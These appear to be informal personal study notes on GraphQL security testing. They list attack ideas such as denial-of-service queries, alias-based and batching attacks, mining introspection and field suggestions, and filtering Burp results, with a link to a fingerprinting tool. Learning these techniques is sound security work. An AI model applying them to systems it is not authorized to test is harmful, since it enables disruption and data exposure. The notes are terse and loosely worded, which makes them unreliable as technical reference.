Alternative to traditional rest api to fetch data , can get required information about an object(table in traditional database) in a single request
ORM stands for Object-Relational Mapping, a programming technique that allows developers to work with data from relational databases using the same object-oriented programming language (OOP) structures they’re already familiar with.
https://github.com/dolevf/graphw00f
sytemupdate query - can trigger dos
Queries are executed sequentially mutations happen parallely
Alias based attacks Query batching
queries can be configured as mutations…
query mutation subscription
Tip
filter by response body - filter by regex in burp to find vulns
Mutations
Todo
Learn to read results from interospection queries
Manual mutations are the money baggers
Graphql will tell you correct field names when u send wrong fields
field suggestions - will point out what suggestion